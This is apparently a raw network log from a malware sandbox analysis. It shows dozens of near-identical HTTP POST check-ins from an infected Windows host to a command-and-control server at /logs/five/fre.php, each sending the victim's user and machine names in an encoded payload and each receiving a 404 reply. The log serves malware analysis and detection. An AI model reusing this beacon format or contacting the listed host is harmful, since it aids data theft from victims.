                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  55192.168.2.224922894.156.177.22080
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:10.324600935 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:10.329967976 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:11.275912046 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:11 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  56192.168.2.224922994.156.177.22080
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:11.497844934 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:11.503151894 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:12.473866940 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:12 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  57192.168.2.224923094.156.177.22080
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:12.662856102 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:12.668267012 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:13.655976057 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:13 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  58192.168.2.224923194.156.177.22080
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:13.804179907 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:13.809587955 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:14.767839909 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:14 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  59192.168.2.224923294.156.177.22080
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:15.131542921 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:15.137054920 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:16.116259098 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:15 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  60192.168.2.224923394.156.177.22080
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:16.274614096 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:16.279984951 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:17.235858917 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:17 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  61192.168.2.224923494.156.177.22080
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:17.441850901 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:17.447185993 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:18.417943954 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:18 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  62192.168.2.224923594.156.177.22080
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:18.559926033 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:18.565336943 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:19.512476921 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:19 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  63192.168.2.224923694.156.177.22080
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:19.657304049 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:19.664243937 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:20.614954948 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:20 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  64192.168.2.224923794.156.177.22080
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:20.899796009 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:20.905170918 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:21.858829021 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:21 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  65192.168.2.224923894.156.177.22080
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:22.005420923 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:22.010823965 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:22.971946955 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:22 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  66192.168.2.224923994.156.177.22080
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:23.249166965 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:23.254520893 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:24.236251116 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:24 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  67192.168.2.224924094.156.177.22080
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:24.378443003 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:24.383881092 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:25.354872942 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:25 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  68192.168.2.224924194.156.177.22080
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:25.504637003 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:25.510440111 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:26.462450981 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:26 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  69192.168.2.224924294.156.177.22080
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:26.678481102 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:26.683857918 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:27.659796953 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:27 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  70192.168.2.224924394.156.177.22080
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:27.808581114 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:27.814007998 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:28.764031887 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:28 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  71192.168.2.224924494.156.177.22080
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:28.944591999 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:28.949969053 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:29.910845041 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:29 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  72192.168.2.224924594.156.177.22080
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:30.164436102 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:30.169831038 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:31.110714912 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:30 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
